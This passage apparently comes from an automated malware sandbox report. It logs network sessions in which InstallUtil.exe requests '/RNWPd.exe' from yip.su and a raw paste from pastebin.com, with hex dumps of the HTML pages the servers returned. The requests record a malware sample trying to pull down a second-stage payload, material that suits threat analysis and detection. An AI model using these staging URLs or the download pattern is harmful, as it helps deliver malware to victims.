                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:42 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:42 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.849725188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:43 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:43 UTC894INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:43 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:43 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjVG2Ns7XQtEUC4YOWZsZ7H39p9RwqzjL6SomgRl2HZxolX7X8cftLYsGS4veyz2PKNJpZq8DjLynCBhHsT4L5JrJrSySx8xNrrtDFjZEdd7K6OXBMOgzB4%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227db75c9c1971-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:43 UTC475INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:43 UTC1369INData Raw: 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                          Data Ascii: ontent="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:
                          2024-09-12 20:01:43 UTC1369INData Raw: 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 3b 61
                          Data Ascii: #338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s;a
                          2024-09-12 20:01:43 UTC1369INData Raw: 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e 73 70
                          Data Ascii: Data.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.sp
                          2024-09-12 20:01:43 UTC1369INData Raw: 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73
                          Data Ascii: .wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radius
                          2024-09-12 20:01:43 UTC1369INData Raw: 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e
                          Data Ascii: n:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain
                          2024-09-12 20:01:43 UTC150INData Raw: 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: ition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:43 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.849726172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:48 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:48 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227dd74b9c1831-EWR
                          2024-09-12 20:01:48 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:48 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:48 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:48 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.849727188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:49 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:49 UTC900INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:49 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:49 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXDblnMKuFqpAU4zWd2UEXzOUZdJ1zdD1l%2Fl%2B%2FP5o4rqtXJsR0cM9CVGHf4n5OviGuM05xYofn2xN0hqL3MDz1yY5ha2IuBWtpFo3AUVY7QteUUzQO32H2o%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227ddb28f77cf9-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:49 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:49 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                          Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                          2024-09-12 20:01:49 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                          Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                          2024-09-12 20:01:49 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                          Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
